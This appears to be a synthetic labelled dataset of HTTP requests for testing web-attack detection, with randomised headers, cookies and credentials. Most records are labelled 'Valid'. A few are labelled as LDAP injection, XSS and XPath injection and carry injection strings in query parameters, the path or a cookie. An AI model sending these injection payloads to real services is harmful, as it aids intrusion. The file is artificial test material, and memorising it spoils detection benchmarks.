Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: prDDbo-mtrkEit;q=0.8, r-es7rOt;q=0.9, wcad-octsm;q=0.6
Cache-Control: no-transform
Client-ip: 24.79.172.50
Cookie: EwbV.V=4245;iHphpwNXU=62;TEE_IvOyIj=cjzscpwnUiGl;sonastoeEa=5313;eriee1lst=148258;oKZw=bqaheejte0tausz
Cookie2: $Version="38"
Date: Sat, 17 Jul 04 02:02:42 CET
ETag: W/"pKrvb-.Q-sOD@DVzJlF"
Expect: gdT8cnm=al6eSirf;6aaEe
From: sdRsrbm@8Ksyhxnv6C.uk
If-Modified-Since: Wed, 09 Nov 05 21:46:49 CET
If-Unmodified-Since: Wed, 18 Feb 04 14:22:35 UTC
If-Match: "w0ULpoiMTeOUomSPlM63"
If-None-Match: *
If-Range: Sat, 12 Dec 09 01:20:54 CET
Max-Forwards: 526
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZGFhaGJsOmh0MmRk
Authorization: Digest response="6394Ca64686c4f8BB9Fb117fDDBf7deb"
Range: 1736-284,81-975030,-1107
Referer: http://hsere.gov/yoaddib/M4hoh2c.js
TE: trailers,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/2.2 (compatible; MSIE 3.4; WinNT; esx9aywdr; EEroqer)
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 961x2992
Via: 6.5 221.4.121.67
Transfer-Encoding: compress
Upgrade: lfn/6.1, EejE/5.5, dt2/9.5
Warning: 628 67.26.215.19 "pv5dhesasmwm" 
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23668
Start - Id: 527
class: Valid
GET /ahqSnacrrevg4S4etoeu/eAOfq/tijWeUj99rtsQ.php?bprsfkDe33=28551&lrs6rciny=taZ31wuIRt&ACEntccuuobyu=1q%5CtHacceptEe&Reem1T=nlaein&CbborEhtpassS9wr=e-rVrSuF2&nghfsieugt2o5=0ezmlmNph&oe8lnp=lmsccxslwd&seanaonAic1xo=ii57ueiacmdie&eeDeaoe=bka4&oiotoeo0tt=vrNQiN&hiavssb=hoU78O&shneyWaon2=vbscriptD%3Eakgjoeeoha18&e.L0=49&-jf_eetcboot.inidnf=ui HTTP/1.1
Host: www.hslO.fr
Connection: keep-alive
Accept: image/*, image/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: n8oo=pxexoRsp
Client-ip: 35.158.185.35
Cookie: wcceeswiheh=daakkhmd9nniet2;oe=dtooOqcmd=iZ;orewE=e'~l
Cookie2: $Version="17"
Date: Sun, 17 Sep 06 18:50:51 UTC
ETag: W/"iu6tK5Qe@Hf8Sj7xQ"
Expect: dboav
From: Ru2z@lmhsqeaaEt.gov
If-Modified-Since: Tue, 02 May 06 10:17:12 UTC
If-Unmodified-Since: Sun, 20 Jan 08 21:53:44 CET
If-Match: "l.EGNDX1sgEEOd."
If-None-Match: "opYflFOVH-94bHI"
If-Range: Wed, 18 Feb 09 04:14:16 GMT
Max-Forwards: 98
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 6muw eomas=dln2
Range: 016-,6116-156945
Referer: /ejott/tiweorn1/tItists/c9gews5/Hosjaax.mpeg
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/4.5 (compatible; Konqueror/2.6; Open BSD i386; ets1i; rhdLr; 5e1e)
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: 4.4 www.whtpc.css, HTTP/3.4 www.sttgk.shtml
Transfer-Encoding: compress
Upgrade: hm4tsE/7.7, sngi/4.9, b9nhx/5.1
Warning: 031 173.215.193.129 "koSnmyiqOdiUot" "Fri, 03 Apr 09 01:48:11 UTC"
X-Forwarded-For: 2.115.5.51
X-Serial-Number: 35520
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 527
Start - Id: 8543
class: Valid
GET /esdIRa50fRU7WYnGxqU/prlrmUiqotbyDOg/phpEr/60Ws5x/hhcuri.cfm? HTTP/1.1
Host: www.aqs8H0oO.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 215.104.92.124
Cookie: xiNAb=48;mAiaw=8356580;oId9pnha1t4faIg=99680040
Cookie2: $Version="43"
Date: Tue, 26 Jun 07 05:47:56 GMT
ETag: "c@RfK5QgJdfUpsxLt"
Expect: 100-continue
From: gtmlhhzh@7orj4ow2.net
If-Modified-Since: Mon, 28 Jul 08 12:51:29 UTC
If-Unmodified-Since: Fri, 24 Dec 04 19:39:55 CET
If-Match: "EsUVY13FpeJt4barcfje"
If-None-Match: "cusB0vYgx@BcVf3VswBz"
If-Range: Tue, 27 Apr 04 10:32:30 UTC
Max-Forwards: 36
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM NTR0RWw4bmhpYmE3YW9zYTJlZXR0dGFyaE14bXJvbkNuaA==
Authorization: Basic b2dlcmQ6a2ZmaA==
Range: 288-033,80242-026
Referer: /arss0ee/wdoe/fdtblad/iidEei/eCeonniN.php
TE: trailers,trailers,deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 7.8; bt-ie; rv:3.5.4) Gecko/68938890
UA-CPU: PowerPC
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 108x957
Via: 9.7 www.nfoSe.png, 2.0 www.pte6id.gif, 8.1 www.uoaneton.js
Transfer-Encoding: identity
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 954 www.Aeczdero.html "qhsttduphEhten3esix" 
X-Forwarded-For: 188.45.28.105
X-Serial-Number: 64710408
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8543
Start - Id: 8517
class: Valid
GET /K-XNuBDvw3p/tYunttonitlrcaehtet/ZTxxwsmzXIe5hQU/MnKK/q6dV0/tiRmeohs/3cvoVU5./S45Bupdate0GH@pPNevJ/aMT8D3yLs62wVSTD/io/ekjTegseC6rH5W/hSet.cfm? HTTP/1.0
Host: 73.51.193.111
Connection: oibaa9r
Accept: */*;q=0.3
Accept-Charset: iso-8859-2;q=0.9, iso-8859-2;q=0.0, x-mac-chinesesimp;q=0.1, cp-932;q=0.3, windows-1254;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 116.12.20.60
Cookie: nnNvnuNbsUt=1;hrorwnlD=nhtls7ahn;9ulhKofl4eep=stern1;alvstehfqernego=samare4jElddh4?ahesm&;eeejhnmbeaea=19
Cookie2: $Version="1"
Date: Mon, 23 Jan 06 07:07:53 GMT
ETag: "VYwYeqQX2hURZNlJJfS3"
Expect: slYre
From: esnowat@SliNzma.gov
If-Modified-Since: Thu, 29 Jun 06 13:29:04 GMT
If-Unmodified-Since: Sun, 23 Apr 06 16:16:44 UTC
If-Match: *
If-None-Match: "9MSX4Tzu7-qd3g-tqBE"
If-Range: Tue, 20 Nov 07 13:02:45 GMT
Max-Forwards: 2
MIME-Version: 7.7
Pragma: zhrt=gc
Proxy-Authorization: Basic bnQ0ZTp0TGV0
Authorization: uatT s6as=arnt
Range: 288-033,80242-026
Referer: /ezsp/uielofvo.php4
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/1.2 (Windows; U; Win98 3.4; 6e-pe; rv:2.0.5) Gecko/34545443
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 108x957
Via: 6.3 www.est2s.png
Transfer-Encoding: deflate
Upgrade: ctieoL/1.3, oars/8.2
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8517
Start - Id: 11424
class: Valid
GET /aterxvtlnoOeeo/eesieCLef4ayt/eeiiteeOzia/coamiiwtheismosrer/8.SJ@mC4Na4NT.php3? HTTP/1.1
Host: www.Nab5e.gov
Connection: close
Accept: image/jpeg, image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 209.31.97.203
Cookie: t9biurriStiste=ri sh%uo;7yna8l1rn=aaine;3p_A0INinclude9ITr=i;nnttdocmatW=bodyNcmjvoceRo=mocharlinki;te3E1=107105;xncte=e5dsenn
Cookie2: $Version="405"
Date: Sat, 09 Dec 06 19:55:56 GMT
ETag: "yX9Em7sifjKXLAVjnj"
Expect: msWdr5l=cetnxz3t;stme5
From: iElwxs5p@8am8xdh.it
If-Modified-Since: Wed, 17 Mar 04 04:50:19 UTC
If-Unmodified-Since: Wed, 30 Dec 09 12:14:10 GMT
If-Match: *
If-None-Match: "eaM5MsykrfN@VHtsI"
If-Range: Wed, 17 Sep 08 21:13:21 GMT
Max-Forwards: 5
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: u68si atohazra=reig
Authorization: igeh 68ibd=sq5oie
Range: 140184-,29-
Referer: http://3oxle.net/FEai0o/ZmaheO/Rd4noeu/bltbsitm.png
TE: trailers
Trailer: Referer
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 1.8; si-6e; rv:0.1.4) Gecko/82605128
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1385x852
Via: 3.2 www.pbrar2nt.jpg, HTTP/1.6 28.244.217.36, 6.4 www.noauiitt.jpeg
Transfer-Encoding: deflate
Upgrade: AArn2t/8.5, Ccza/1.6, hDt/3.7, e9H/6.2, ghti/3.0
Warning: 568 211.231.110.107 "4fnct2o" 
X-Forwarded-For: 24.107.212.67
X-Serial-Number: 0375108727
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11424
Start - Id: 37185
class: LdapInjection
GET /tuh0xIh-UrY/R93Ufvbscript/dhSTIH/vjDa44/bO/e5@NZtx.KL0Sl4nO/tbs5NpweaA9sdbIupes/toluwtrz0agy2e3ma/bsa6riljeboNYD/lsu6td.gif?UwinntEb.jnph-2=iy%5C&hlcnofbs1otou=Ree&sDecrottcpx7hyh=dHTQ_7CVO&RhmEmryGArdaEhn=hm%2Fall+u9gnotliketajh3tro&llian=3&5j3r5sa2rw=xr%29%28++++%7C++%28ee%3D*%29&al=iWr84_jhENL&irtj9plsoig=sa%3Ao&prfnatl=uGQ&aeeeeEkie5Atiin=3&Rsh=8 HTTP/1.0
Host: 101.164.78.234
Connection: eard
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oNodn7eT-5hinht;q=0.0, nsn-wmaoaimo;q=0.6, Tea-hitea1, a-t6l;q=0.6, kcliAoar-wIRniba3
Cache-Control: no-cache
Client-ip: 70.71.99.38
Cookie: aswREeeGflOe=4etcri u :D$u:ter ercp;ot5zomusl=8etr;eeurroex=K8=;depddor9ccoCnaa= Hnl
Cookie2: $Version="2"
Date: Sun, 30 Nov 08 15:56:50 UTC
Expect: sgdaie
If-Modified-Since: Sun, 02 May 04 05:48:04 UTC
If-Unmodified-Since: Mon, 11 Aug 08 09:44:33 GMT
If-Match: *
If-None-Match: "ts9IO4T94KkfxVGe2xNl"
If-Range: Thu, 01 Jul 04 13:40:51 GMT
Max-Forwards: 503
MIME-Version: 6.5
Authorization: iai0nd 4nyszpea=dnbr
Range: 3034-,-678,-3
Referer: http://adn7y.be/nDeot.cgi
TE: chunked;q=0.3
User-Agent: ndL6ulrrdw (nMV6S@eo; eovYI35Y)
Via: 6.8 www.tkcegjIl.html, 2.9 www.tlabxmri.tiff, 5.1 186.140.77.130
Transfer-Encoding: sLeol
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37185
Start - Id: 25953
class: Valid
GET /ceXNA8ukgP1H_BuSO/t0zlMYB0HXkWr_osisU.png?n3tR6hea=8&js19h=lJdMr&QWSIsTjevalAG=hdtelneti&tees=7585566&tehimienb7=ldj4&neqsa=%5C41ugfyqrmt&bTiw3elIt=30170&fmuHris7w7Alg=uwv%26%3FOo&hBhN=98625768&iAsnareS=copyf+ HTTP/1.1
Host: www.ov8iiud0o.gov:80
Connection: Ddtcha
Accept: audio/basic
Accept-Charset: iso-2022-kr, x-mac-turkish, iso-8859-9;q=0.0, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 186.203.180.131
Cookie: TeoTneWj3=0Nau;Tllnssaew9jtsd=g)6 zuan9navcO I;1qSJ1=aodu;ouIynxipet=1671;CIrbgsoundTMGhFAhttps=nean;wsniatiuebrt=tlsieey~fscripty
Cookie2: $Version="168"
Date: Tue, 22 Jun 04 08:10:52 GMT
ETag: W/"6YyY6qarKsvHg.8K8Drt"
Expect: rnms2it=eIumt;ufdtRd
From: naaufvp@rOayez.uk
If-Modified-Since: Mon, 20 Mar 06 01:38:25 UTC
If-Unmodified-Since: Thu, 11 Oct 07 22:21:16 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Aug 08 21:54:29 UTC
Max-Forwards: 4321
MIME-Version: 0.5
Pragma: ni7='asnras'
Proxy-Authorization: hsj6ug Ee6me=lshaee6
Authorization: Basic ZW1hbmlxOmluaWlydg==
Range: 27-,-8875
Referer: /yedoemm/wjsutp/n4sot16x.pl
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/1.1 (X11; U; Solaris 4.9; ma-6t; rv:5.9.7) Gecko/01609924
UA-CPU: StrongARM
UA-Disp: 973,4090,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5187x1770
Via: 6.2 www.Efmd.gif:074
Transfer-Encoding: eodho
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25953
Start - Id: 15633
class: Valid
GET /nkKlaGDP.png?nOw=86052&ccWeyct=091050143&iu=eJwYM9&sns1a7ealrri=28466797&uevyhea=uuegoaauw4bgsounddoi&.UscriptQwu2=%40yeza&2apsou6loe=v%5Canxlezsee%7Ewni HTTP/1.0
Host: 119.103.66.111
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 7hisdhse-her7cm;q=0.4, Dneumue3-iMoa;q=0.8, taWlpn-eoS;q=0.8
Cache-Control: no-cache
Client-ip: 149.149.93.192
Cookie: rCreplaceUftpY=f)w
Cookie2: $Version="8"
Date: Sun, 01 Mar 09 20:31:09 GMT
ETag: W/"d.xuqs-kPoPdLOd-bRy"
Expect: os6bi=AtHottq;ytotu
From: aeao@snphxeh.de
If-Modified-Since: Sat, 06 Jan 07 02:03:10 CET
If-Unmodified-Since: Mon, 05 Jun 06 24:41:18 UTC
If-Match: *
If-None-Match: ".xIPa6jSE68QqagK"
If-Range: Sat, 17 Jul 04 04:57:02 CET
Max-Forwards: 845
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM YXJUbHRpZXZlaG9wbHN0cHdzbmV0bnBvemx0YVNpdHQ1bGxuaHdsb2pjc1R0M21p
Authorization: Basic ZGFscnk3Rjptc3QyaG8=
Range: 3-,76842-90
Referer: http://www.aaOAt.uk/eV4hzoBn/nrRfyNui.sh
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/0.9 (Machintosh; U; PPC Mac OS X 1.4; al-2a; rv:1.8.2) Gecko/24091090
UA-CPU: PowerPC
UA-Disp: 6429,5125,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: 2.5 194.127.255.97, HTTP/6.1 www.esikf.jpeg:87093
Transfer-Encoding: gzip
Upgrade: aih/4.7, ohs/5.1
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 38.38.212.159
X-Serial-Number: 42056284732310990
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15633
Start - Id: 2359
class: Valid
GET /nlv/e2reatalbdo/nh@A.340IaAIsQ/iolIfm@gWJ8NHAn63/3NMvTA@agpmbHkN-/ajezmuius2elcCoos/7idatr5thjEn9tiosrAd/dsUl02vih-9/hafmidoelT/ts.html?pAlrn5ldee=3&eeusar=vkwto%29 HTTP/1.1
Host: www.ykee.cz
Connection: samti
Accept: */*
Accept-Charset: macintosh;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 71.240.201.73
Cookie: t6ansos=Fnsay;laaozmhaoiui=0296;snddct6hs=08269;h_g1X7Mj=4551245;eMtueesialA=8078725;qeleeelpnfry7=8009
Cookie2: $Version="470"
Date: Wed, 16 May 07 09:41:09 UTC
ETag: "5c7-vNXIuqgiPYh_yhiq"
Expect: 100-continue
From: snqoqaol@8oEvmf8efw.org
If-Modified-Since: Sun, 28 Jan 07 14:29:32 UTC
If-Unmodified-Since: Sun, 18 Feb 07 09:09:30 GMT
If-Match: "Zky4ppy9D6Oqtbqhuj@"
If-None-Match: *
If-Range: "YRl1YX2JLQenkrfd"
Max-Forwards: 7017
MIME-Version: 4.5
Pragma: lel='ttdn'
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Digest uri=/Meokm/9nir50/Tprot/cdaapn7r.shtml
Range: -6000,-150
Referer: http://www.lOoeheyD.net/nr90g.php3
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: mdi2czIl10 http://www.ea7c2e.net
UA-CPU: 68000
UA-Disp: 6863,178,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3780x3384
Via: 5.5 104.254.45.133:08
Transfer-Encoding: deflate
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 090 www.phtammg.png "tsieHnlufsaN" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2359
Start - Id: 28785
class: Valid
GET /nzZT8bA9e/hmA@.EfG3/br5HugVyWmOM/owHgSk291/ftmMoriclneHheesbacU/dS.-1Q1gx_HF/htoh/nryDwG_h0/lti9a1MX4Z/durUdnKrhok0rlag.dll?aacrsfMtu=y5z&iara0sNlslnyhse=Lt%3D&eirsonO=a5kWRoMBz81z&3e=nqy&1aoEaoevIysaraD=u9atoRrh&7nreehoer=5548952&rlOkeeraw5rE9=etavtsitohwsZacncj&rir9Oan=nlike&ey=eidaortBhf&egom=782792 HTTP/1.0
Host: www.bphshoal3.de
Connection: Ivohdstu
Accept: */*
Accept-Charset: windows-1258;q=0.2, utf-8;q=0.2, koi8;q=0.8, macintosh;q=0.7, windows-1257;q=0.2
Accept-Encoding: identity
Accept-Language: a-9;q=0.8, lrtzette-gEhaR4y;q=0.8, hNq5okns-o
Cache-Control: no-transform
Client-ip: 175.213.75.253
Cookie: heuHkndoo1et0=91;t9si5eotszlutAh=13083
Cookie2: $Version="998"
Date: Fri, 22 Feb 08 13:55:14 UTC
ETag: "FSutTBXPB3wT@Ew"
Expect: u2eullm
From: yrrE0@eR1rsh.ch
If-Modified-Since: Sat, 20 Jan 07 18:09:52 GMT
If-Unmodified-Since: Wed, 14 Apr 04 07:23:44 GMT
If-Match: *
If-None-Match: "Ytmk1kmTP2.YyGk"
If-Range: "456-AY3.m@lISdPZON"
Max-Forwards: 2048
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM bjNvbWV1cmFyY3hmaGVtbUtubG5yM2VjZWVzTGNtcGd0bGRvOWdtOGNubHhvYUU=
Authorization: iqsse cPnhH=liwelgu
Range: -20
Referer: http://Etiovs.cz/Mr4cir/mGimbr/hcNee3m/s7uepjvg.asp
TE: trailers,trailers,chunked;q=0.0
Trailer: Pragma
User-Agent: gn3bh (tU7E2z; ip7Jy1; pYNXRgd_6)
UA-CPU: x86
UA-Disp: 982,8595,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5260x374
Via: 2.5 www.illEn.jpg, 6.5 www.elasx.gif
Transfer-Encoding: compress
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 263 www.orehreth.jpg "pIt9" "Wed, 11 Jul 07 24:19:28 CET"
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 39502
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28785
Start - Id: 16710
class: Valid
GET /sD6iZ17H/eXcYS/R3H.Hw-2T/cZz5bB__NUdoZNn/zze/4xtermOorClF5LQV.Zq.js?usnaT=109147&c9includeFw=%7Chnfexecmiou%3Adspboe&seroifasc=+allUe&J3includekYform=t6innc&ce=1 HTTP/1.1
Host: 9.179.236.212
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-8;q=0.9, x-mac-korean
Accept-Encoding: gzip;q=0.7, deflate;q=0.3, deflate;q=0.0
Accept-Language: *
Cache-Control: min-fresh=55014
Client-ip: 222.152.226.196
Cookie: erEnorretoh=eesaaerri;7H8V1L=lw4oS
Cookie2: $Version="706"
Date: Mon, 01 May 06 13:40:46 CET
ETag: "lU3lW.mlpvrUFxzvnDj"
Expect: 100-continue
From: o6botttt@Meerth.org
If-Modified-Since: Sat, 01 Dec 07 06:58:07 CET
If-Unmodified-Since: Fri, 24 Aug 07 20:02:41 GMT
If-Match: *
If-None-Match: *
If-Range: "Spn0SnVTZnxxdfVMG"
Max-Forwards: 5081
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic cm50emlpbjo3aWluaTh0Zg==
Authorization: NTLM T3J5b2pkY2FpbmRUb2xUaWFzZWVwZWVlM2Fmc25zTWhnZWwwd05FbHVhag==
Range: 735-128151,-280736
Referer: /edaen.jpg
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 3.6; yt-tb; rv:5.2.4) Gecko/88785644
UA-CPU: x86
UA-Disp: 7604,2520,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2598x289
Via: FTP/9.4 161.134.167.156:43285, 8.7 www.1fon.shtml, HTTP/0.0 www.inACso.tiff
Transfer-Encoding: sntis
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 930 96.102.226.255 "rmts" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 88173
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 16710
Start - Id: 46482
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: www.na2ags.de
Connection: close
Accept: text/html;q=0.8, audio/*;q=0.6, audio/basic
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: m6et8l-shet;q=0.7, tin-soeo0y;q=0.4
Cache-Control: max-age=41248
Client-ip: 98.141.212.240
Cookie: 68wgetK=Lmai8sarlM;x_LYOWS@c9=Rratahe;loteen79sHpeus=p0fylrBFaHA8;s7qtnuya=519;ebdr4eyO=eewindow.opendmopencopyr[m;dcerfsYiye=9eTr&w2
Cookie2: $Version="376"
Date: Sat, 20 Oct 07 23:12:18 CET
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Thu, 03 Jan 08 05:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 474
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM NmlrZHBhbnJlc3cwbGVBc292aWF1YXNtcmk4YWlkc2ZsZHV4YXJwM2t1bWNI
Authorization: NTLM aUV3ZnNvaG9zN29laW9mZWh0YXdlTnQwZWl0aWFnMWU=
Range: -540
Referer: /mreA/cat9/isvn.mp3
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 8.7; nh-in; rv:6.8.8) Gecko/85162245
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: HTTP/1.3 16.151.24.152, FTP/5.2 www.oedi.css, loea/5.6 www.lmuilsea.shtml
Transfer-Encoding: gzip
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46482
Start - Id: 14273
class: Valid
GET /e4Jfj/stt7fle6re/2-c7autoexecHvDamh@OHfrom/ZwFw_Cpasswd.v7Zusr/slslieisa3octAe/trC/eM3/dnefmNmayec/6ZOyBtO2NUEnK_pX80q/elh8rsOF/oynSmtcscbpb7rLph7mh/nIbdeM.jsp? HTTP/1.0
Host: 59.139.20.134
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-874, euc-cn;q=0.3, iso-2022-jp;q=0.3, iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: qd=tSAnu
Client-ip: 129.101.44.20
Cookie: ri=eNlugMB5wYWN
Cookie2: $Version="670"
Date: Thu, 21 Sep 06 01:55:49 CET
ETag: "MsMPrJNM44hZ_6."
Expect: lbei=otDwIx
From: rhaheh@nsnh.ch
If-Modified-Since: Thu, 21 Sep 06 18:07:32 UTC
If-Unmodified-Since: Tue, 12 Aug 08 03:17:56 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Apr 05 08:16:23 CET
Max-Forwards: 4413
MIME-Version: 7.4
Pragma: xGzwvn=5frmbvte
Proxy-Authorization: NTLM ZW5hODd6YTMxZG5uQXRHcHl1YWZvRXRlMG9pc2RxM2Ryb2FldXJzcWlpamFsYWw=
Authorization: NTLM ZVNwYmwzNW9sbHRDdGk4bmdwcmI5b2loUHVoZWVvbG10YW9laEFteWFjdA==
Range: 690218-443212,-16920,80-2
Referer: http://tdtamor.com/tEks/cen1i19/svEqu/Srse/tsovdd.css
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: 1Nllsog (s8QYING64-; 7eBj0m; voBVqp3yNl; sI8Jvs; gWp0qyQ)
UA-CPU: 68000
UA-Disp: 2772,8077,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2883x951
Via: FTP/6.2 www.hs0Tvka.shtml:903, 8.3 173.142.255.242, 7.4 73.98.210.11
Transfer-Encoding: deflate
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 261 160.174.141.172 "5cebyhn2vuze" "Sun, 25 Jun 06 09:52:04 UTC"
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 4359426
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14273
Start - Id: 50094
class: XPathInjection
POST /lemtlleAl/9XaFBV2OvUjAvANUvgoJ/a8V/2atdE6giSmn/oH1.ahBuTE/vMIuy/taZk.Q/enzu4aZR@3lrB/l.Lz5upyTe5/ewSH/iUFEYgaTvGMHA.cfm? HTTP/1.0
Content-Length: 149
Content-Language: c
Content-Encoding: deflate
Content-Location: http://www.lscve.gov/anfiew/frrtxdca/1sarorE/hswh.cfm
Content-Type: application/x-www-form-urlencoded
Host: www.e3azguitgr.uk:80
Connection: close
Accept: application/x-tar, audio/x-wav, video/quicktime;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, identity, compress
Accept-Language: *
Cache-Control: max-stale
Cookie: tkjylnnim=71842500;sczrynrehanDnc=615285375;lej7Roybnetb=3662601312;ofn2g=ear'    or  count( path/child::node()[position( )=((    i    +  j+k  + l  +1)]     |   path/child::*()[position()=(k+1)])=1  or     'i58tnU'   =' kNUeor'   or;au3deletewindow.open8kexec8=RiCynBtis
Cookie2: $Version="0"
Date: Sat, 17 Jan 09 09:29:59 UTC
If-Modified-Since: Wed, 19 Dec 07 11:37:30 GMT
If-Match: "XaS1IqMtFDROqAyuko6V"
If-Range: "QPZ9Fmn1mI2zBPln"
Max-Forwards: 0
Proxy-Authorization: Basic dXBhclRqQTpoYm0yenN0
Authorization: Digest response="0bFd58b0593D5FE14ae4B3436beb1789"
Referer: http://teai.st/srtefo/cuAQ/e8itl/e7xeu.avi
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 3.3; fm-na; rv:8.1.0) Gecko/53638798
UA-Color: color16
Via: 6.0 92.160.6.29, FTP/7.2 www.h93n2eo.htm
Transfer-Encoding: compress

Q8.eoUq5=ol&featnatoah=nl5ttaavhadeoi&T8nyrd=967978&tumh=tperlctnsuhec&ttlwejpiNoahy=7o&f8linkcopy=tOl&etcCc8ssfnampoi=linkw5ratws&tIurceeft2o=yNUuEL

End - Id: 50094
Start - Id: 13589
class: Valid
